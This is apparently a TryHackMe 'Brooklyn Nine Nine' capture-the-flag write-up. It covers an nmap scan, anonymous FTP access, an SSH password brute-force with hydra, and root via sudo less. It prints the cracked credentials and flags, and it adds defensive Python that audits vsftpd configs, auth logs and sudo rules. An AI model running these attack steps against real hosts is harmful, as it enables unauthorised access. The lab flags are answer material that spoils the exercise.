Service discovery
┌──(rootkali)-[~/tryhackme]
└─# nmap -sV -Pn 10.10.60.116
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 05:20 EDT
Nmap scan report for 10.10.60.116
Host is up (0.34s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
Anonymous login to the FTP service
┌──(rootkali)-[~/tryhackme/brooklyn]
└─# ftp 10.10.60.116
Connected to 10.10.60.116.
220 (vsFTPd 3.0.3)
Name (10.10.60.116:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.06 secs (1.9443 kB/s)
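The "230 Login successful." for user anonymous comes straight from the server's vsftpd.conf. The following Python is an added example, not part of this writeup: it parses a vsftpd.conf and reports the directives that produce the behaviour seen above, with a weak configuration beside a hardened one. Both configs are constructed; the directive names are real vsftpd options as documented in vsftpd.conf(5).

```python
"""Audit vsftpd.conf for the anonymous-access and transport settings.
Added example; the two sample configs below are constructed."""

# Constructed: the settings that let 'anonymous' log in and list files.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
anon_upload_enable=YES
local_enable=YES
write_enable=YES
"""

# Constructed: anonymous access off, users jailed, credentials protected.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
ssl_enable=YES
"""


def parse_vsftpd_conf(text):
    """Return {directive: VALUE} for key=value lines.

    vsftpd ignores blank lines and '#' comments. Boolean values are
    accepted in several spellings (YES/yes/true/1), so normalise to upper.
    """
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip().upper()
    return conf


def is_on(conf, key, default):
    """True if a boolean directive is enabled; 'default' is vsftpd's
    compiled-in value used when the directive is absent from the file."""
    return conf.get(key, default) in ("YES", "TRUE", "1")


def audit_vsftpd(conf):
    """Return a list of findings (empty list means nothing to report)."""
    findings = []
    # vsftpd's built-in default for anonymous_enable is YES, so an absent
    # directive is as exposed as an explicit YES (Ubuntu's shipped file sets NO).
    if is_on(conf, "anonymous_enable", "YES"):
        findings.append("anonymous_enable: anonymous logins allowed "
                        "(an absent directive defaults to YES)")
    if is_on(conf, "anon_upload_enable", "NO"):
        findings.append("anon_upload_enable: anonymous users may upload files")
    if is_on(conf, "anon_mkdir_write_enable", "NO"):
        findings.append("anon_mkdir_write_enable: anonymous users may create directories")
    if not is_on(conf, "ssl_enable", "NO"):
        findings.append("ssl_enable: off, passwords and file contents cross "
                        "the network in cleartext")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_vsftpd(parse_vsftpd_conf(text)))
```

The default-value check is the point a quick grep misses: a vsftpd.conf with no anonymous_enable line at all still accepts anonymous logins, so the audit must reason about absent directives, not just present ones.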
A file named note_to_jake.txt was downloaded.
View the file
┌──(rootkali)-[~/tryhackme/brooklyn]
└─# cat note_to_jake.txt
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
This is practically an invitation to crack his SSH password, so crack it with hydra.
┌──(rootkali)-[~/tryhackme/brooklyn]
└─# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.60.116 ssh -t 20 -v                                    130 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-24 05:26:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 20 tasks per 1 server, overall 20 tasks, 14344399 login tries (l:1/p:14344399), ~717220 tries per task
[DATA] attacking ssh://10.10.60.116:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jake@10.10.60.116:22
[INFO] Successful, password authentication is supported by ssh://10.10.60.116:22
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[22][ssh] host: 10.10.60.116   login: jake   password: 987654321
[STATUS] attack finished for 10.10.60.116 (waiting for children to complete tests)
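Every one of those 14 million attempts lands in the target's /var/log/auth.log as a "Failed password" line from the same source address, and the "Connection reset by peer" errors are sshd's MaxStartups throttling dropping surplus parallel connections, which slows a guessing run but does not stop it. The Python below is an added example, not part of this writeup: it parses sshd auth.log lines and raises two alerts a defender would want, a burst of failures from one address and a success that follows such a burst (the pattern of the run above). The log lines are constructed in the format Ubuntu's sshd writes; the year is assumed because syslog timestamps omit it.

```python
"""Detect SSH password guessing and a success-after-failures login from
sshd auth.log lines. Added example; the sample log is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a burst of failures from one address, then a success,
# then ordinary activity from another user and address.
SAMPLE_AUTH_LOG = """\
Sep 24 05:26:35 brookly_nine_nine sshd[2011]: Failed password for jake from 10.9.1.5 port 51200 ssh2
Sep 24 05:26:35 brookly_nine_nine sshd[2012]: Failed password for jake from 10.9.1.5 port 51201 ssh2
Sep 24 05:26:36 brookly_nine_nine sshd[2013]: Connection closed by authenticating user jake 10.9.1.5 port 51202 [preauth]
Sep 24 05:26:37 brookly_nine_nine sshd[2014]: Failed password for jake from 10.9.1.5 port 51203 ssh2
Sep 24 05:26:38 brookly_nine_nine sshd[2015]: Failed password for jake from 10.9.1.5 port 51204 ssh2
Sep 24 05:26:39 brookly_nine_nine sshd[2016]: Failed password for jake from 10.9.1.5 port 51205 ssh2
Sep 24 05:26:40 brookly_nine_nine sshd[2017]: Failed password for jake from 10.9.1.5 port 51206 ssh2
Sep 24 05:26:41 brookly_nine_nine sshd[2018]: Accepted password for jake from 10.9.1.5 port 51207 ssh2
Sep 24 05:30:02 brookly_nine_nine sshd[2050]: Failed password for amy from 10.9.1.77 port 40012 ssh2
Sep 24 05:40:10 brookly_nine_nine sshd[2090]: Accepted publickey for amy from 10.9.1.77 port 40020 ssh2
"""

# Matches the Failed/Accepted result lines; other sshd lines are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_events(text, year=2021):
    """Turn auth.log text into a list of authentication events."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # connection-closed, session-opened, etc.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"time": ts, "ok": m["result"] == "Accepted",
                       "method": m["method"], "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60),
                      lookback=timedelta(minutes=10)):
    """Return alerts: 'brute_force' when one source address produces
    >= threshold failures inside `window`, and 'success_after_failures'
    when an accepted login is preceded by >= threshold failures from the
    same address within `lookback` (a guessed password, not a typo)."""
    alerts = []
    failures = defaultdict(list)  # ip -> sorted failure timestamps
    for e in sorted(events, key=lambda e: e["time"]):
        if not e["ok"]:
            failures[e["ip"]].append(e["time"])

    # Sliding window over each address's failures.
    for ip, times in failures.items():
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"type": "brute_force", "ip": ip,
                               "count": end - start + 1, "until": times[end]})
                break  # one alert per address is enough

    # A success that follows a run of failures from the same address.
    for e in events:
        if e["ok"]:
            prior = [t for t in failures.get(e["ip"], [])
                     if e["time"] - lookback <= t <= e["time"]]
            if len(prior) >= threshold:
                alerts.append({"type": "success_after_failures", "ip": e["ip"],
                               "user": e["user"], "failures": len(prior)})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)):
        print(alert)
```

The second alert type is the one worth paging on: a rate limiter or fail2ban jail reacts to the burst, but only the success-after-failures rule says the account is now compromised and needs its password rotated and sessions reviewed. The durable fix on the host is the note's own advice plus PasswordAuthentication no in sshd_config, so a wordlist has nothing to match.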
The cracked password is jake:987654321
user.txt is found in the /home/holt directory.
┌──(rootkali)-[~/tryhackme/brooklyn]
└─# ssh jake@10.10.60.116
The authenticity of host '10.10.60.116 (10.10.60.116)' can't be established.
ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.60.116' (ECDSA) to the list of known hosts.
jake@10.10.60.116's password:
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ whoami
jake
jake@brookly_nine_nine:~$ pwd
/home/jake
jake@brookly_nine_nine:~$ cd ..
jake@brookly_nine_nine:/home$ ls
amy  holt  jake
jake@brookly_nine_nine:/home$ cd amy
jake@brookly_nine_nine:/home/amy$ ls
jake@brookly_nine_nine:/home/amy$ cd ../holt/
jake@brookly_nine_nine:/home/holt$ ls
nano.save  user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee
Check sudo privileges with sudo -l: jake may run /usr/bin/less as root without a password.
jake@brookly_nine_nine:/home/holt$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
Escalate privileges to root through the shell escape in less
jake@brookly_nine_nine:/home/holt$ sudo less /etc/profile
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
-- Creator : Fsociety2006 --

Congratulations in rooting
Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845

Enjoy!!
#
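The root shell comes from a sudoers rule, not a software bug: less can launch a subprocess, and sudo hands that subprocess root. The Python below is an added example, not part of this writeup, covering the sudo -l check and the escalation it enables: it parses the text of sudo -l into rules and flags the ones an administrator should fix, namely unrestricted ALL, NOPASSWD, and commands whose binary is known to run subprocesses unless the rule carries sudo's NOEXEC tag. The sample output is constructed around the real rule shown above with hypothetical extra rules added to exercise each check; the shell-escape list is a short set of well-known pagers and editors, not an exhaustive one.

```python
"""Audit the rules in `sudo -l` output for privilege-escalation risk.
Added example; the sample below is constructed around the page's rule."""
import os
import re

# Constructed: the real less rule from the page plus three hypothetical
# rules (a safe one, a NOEXEC-protected pager, and full sudo).
SAMPLE_SUDO_L = r"""
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
    (root) /usr/bin/systemctl restart apache2
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (ALL : ALL) ALL
"""

# Pagers and editors that can run a subprocess from inside the program;
# short, illustrative list, not exhaustive.
SHELL_ESCAPE_BINARIES = {"less", "more", "vi", "vim", "nano", "man"}

# "(runas) TAG: TAG: command args" as printed by sudo -l.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text):
    """Return the rule lines that follow the 'may run the following
    commands' header as dicts with runas, tags and cmd."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # Defaults block, skipped
        m = RULE_RE.match(line.strip())
        if m:
            tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
            rules.append({"runas": m["runas"].strip(), "tags": tags,
                          "cmd": m["cmd"].strip()})
    return rules


def audit_sudo_rules(rules):
    """Return findings: each is the rule's cmd with a list of reasons."""
    findings = []
    for rule in rules:
        reasons = []
        if rule["cmd"] == "ALL":
            reasons.append("unrestricted")
        else:
            binary = os.path.basename(rule["cmd"].split()[0])
            # NOEXEC makes sudo block the program's execve of anything else,
            # which is the documented mitigation for pagers and editors.
            if binary in SHELL_ESCAPE_BINARIES and "NOEXEC" not in rule["tags"]:
                reasons.append("shell_escape")
        if "NOPASSWD" in rule["tags"]:
            reasons.append("nopasswd")
        if reasons:
            findings.append({"cmd": rule["cmd"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

For the rule on this box the cleanest fix is to remove it: if jake genuinely needs to read a root-only file, grant a non-interactive command on that exact path instead of a pager, and keep NOEXEC as a second layer where an interactive program cannot be avoided.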